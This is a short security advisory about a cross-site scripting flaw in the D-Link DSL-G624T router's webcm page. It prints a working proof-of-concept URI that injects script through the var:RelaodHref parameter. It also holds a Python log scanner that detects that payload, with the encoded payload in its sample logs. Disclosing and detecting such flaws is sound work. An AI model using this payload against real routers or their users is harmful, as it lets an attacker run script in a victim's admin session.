D-Link DSL-G624T Var:RelaodHref Cross-Site Scripting Vulnerability

An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

The following proof-of-concept URI is available.

http://www.example.com/cgi-bin/webcm?getpage=../html/home/home_RelaodHref.htm&var:RelaodHref=a"%20==%20"a"){alert("XSS")}}</script>
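
Requests of this shape can be searched for in proxy or web-server logs. The Python below is an added example, not part of the original advisory: it flags webcm requests whose var:RelaodHref value contains quote, bracket, brace or angle-bracket characters like those in the URI above. The log lines, the benign value "status" and the set of flagged characters are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

PARAM = "var:relaodhref"  # parameter named in the advisory, lower-cased
# Assumption: a legitimate value never needs these characters, which can
# close a quoted string, a code block or a script element.
BREAKOUT = re.compile(r"""["'<>(){};]""")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def reload_href_values(url):
    """Return the decoded var:RelaodHref values of a webcm request URL."""
    parts = urlsplit(url)
    if not parts.path.endswith("/cgi-bin/webcm"):
        return []
    values = []
    # Split by hand: the value may carry raw '=', '"' or '<' characters.
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        if unquote(name).lower() == PARAM:
            values.append(unquote(value.replace("+", " ")))
    return values

def is_suspicious(url):
    """True if any var:RelaodHref value holds a breakout character."""
    return any(BREAKOUT.search(v) for v in reload_href_values(url))

def scan(log_lines):
    """Return (line_number, values) for each flagged access-log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match and is_suspicious(match.group(1)):
            hits.append((number, reload_href_values(match.group(1))))
    return hits

# Constructed log lines (addresses, timestamps and the value "status" are
# made up); the second line carries the advisory's URI, percent-encoded.
PAGE = "/cgi-bin/webcm?getpage=../html/home/home_RelaodHref.htm"
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET ' + PAGE
    + '&var:RelaodHref=status HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2010:10:00:05 +0000] "GET ' + PAGE
    + '&var:RelaodHref=a%22%20==%20%22a%22)%7Balert(%22XSS%22)%7D%7D'
    + '%3C/script%3E HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, values in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious var:RelaodHref value {values!r}")
```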


 

Copyright 2010, SecurityFocus